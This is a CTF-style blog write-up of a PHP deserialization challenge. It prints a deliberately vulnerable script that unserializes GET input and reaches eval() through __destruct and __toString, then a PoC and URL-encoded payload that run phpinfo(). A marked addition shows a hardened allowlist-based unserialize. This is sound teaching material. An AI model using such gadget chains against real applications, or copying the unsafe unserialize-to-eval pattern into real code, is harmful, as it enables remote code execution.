Two PHP deserialization challenges

Qiqi's Blog     2018-05-19   1996 words


easy_unserialize

A detailed writeup for this one is in my other blog post:

http://codeqi.top/2018/05/19/MiniLCTF-Writeup/

Exercise 2

Challenge:

<?php
class test1
{
    public $varr;
    function __construct()
    {
        $this->varr = "index.php";
    }
    function __destruct()
    {
        if(file_exists($this->varr)){
            echo "<br />文件".$this->varr."存在<br />";
        }
    }
}

class test2
{
    public $varr;
    public $obj;
    function __construct()
    {
        $this->varr='123456';
        $this->obj=null;
    }
    function __toString()
    {
        $this->obj->execute();
        return $this->varr;
    }
    function __destruct()
    {
        echo "<br />这是f2的析构函数<br />";
    }
}

class test3
{
    public $varr;
    function execute()
    {
        eval($this->varr);
    }
    function __destruct()
    {
        echo "<br />这是f3的析构函数<br />";
    }
}

if (isset($_GET['x'])) {
    unserialize($_GET['x']);
}
?>

The test1 class echoes $this->varr in its destructor, so if varr holds an instance of test2, the string conversion invokes test2's __toString() magic method.

__toString() calls the execute() method of test3 on $this->obj.

execute() passes $this->varr to eval(), so arbitrary PHP code can be executed.

PoC

<?php
class test1
{
      public $varr;
      function __construct()
      {
          $this->varr = new test2();
      }
}
class test2
{
      public $varr;
      public $obj;
      function __construct()
      {
          $this->varr='123456';
          $this->obj=new test3();
      }
}
class test3
{
      public $varr;
      public function __construct()
      {
          $this->varr = 'phpinfo();';
      }
}
$a = new test1();
echo urlencode(serialize($a));
?>

Running this gives:

O%3A5%3A%22test1%22%3A1%3A%7Bs%3A4%3A%22varr%22%3BO%3A5%3A%22test2%22%3A2%3A%7Bs%3A4%3A%22varr%22%3Bs%3A6%3A%22123456%22%3Bs%3A3%3A%22obj%22%3BO%3A5%3A%22test3%22%3A1%3A%7Bs%3A4%3A%22varr%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D%7D

Payload:

x=O%3A5%3A%22test1%22%3A1%3A%7Bs%3A4%3A%22varr%22%3BO%3A5%3A%22test2%22%3A2%3A%7Bs%3A4%3A%22varr%22%3Bs%3A6%3A%22123456%22%3Bs%3A3%3A%22obj%22%3BO%3A5%3A%22test3%22%3A1%3A%7Bs%3A4%3A%22varr%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D%7D
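Added example, not code from the original post: a hardened replacement for the challenge's bare unserialize($_GET['x']) that uses the allowed_classes option (PHP 7.0+) and then replays the payload above against it. The function names and the allowlist contents are assumptions chosen for illustration.

```php
<?php
// Classes the application genuinely needs to restore from serialized form.
// test1/test2/test3 are deliberately absent: without a real instance,
// __destruct -> __toString -> execute -> eval can never be triggered.
const ALLOWED_CLASSES = ['ArrayObject'];

// Recursively check whether a decoded value contains any class that was
// not on the allowlist (PHP substitutes __PHP_Incomplete_Class for those).
function contains_incomplete_class($value): bool
{
    if ($value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value) || is_object($value)) {
        foreach ((array) $value as $inner) {
            if (contains_incomplete_class($inner)) {
                return true;
            }
        }
    }
    return false;
}

// Drop-in replacement for unserialize($_GET['x']) in the challenge code.
// Returns null for malformed input or for any graph holding unknown classes,
// instead of handing the caller objects whose magic methods it never meant to run.
function safe_unserialize(string $data)
{
    $value = @unserialize($data, ['allowed_classes' => ALLOWED_CLASSES]);
    if ($value === false && $data !== 'b:0;') {
        return null; // unserialize() failed (b:0; is the only legitimate false)
    }
    return contains_incomplete_class($value) ? null : $value;
}

// The post's payload, urldecoded. With the allowlist in place no test1 object
// is created, so its destructor (and the rest of the chain) has nothing to fire.
$payload = 'O:5:"test1":1:{s:4:"varr";O:5:"test2":2:{s:4:"varr";s:6:"123456";s:3:"obj";O:5:"test3":1:{s:4:"varr";s:10:"phpinfo();";}}}';
var_dump(safe_unserialize($payload));

// Ordinary application data still round-trips through the same function.
var_dump(safe_unserialize(serialize(['user' => 'alice'])));
?>
```

Signing serialized data with an HMAC before it leaves the server, or switching to JSON for user-supplied state, removes the need to unserialize untrusted input at all.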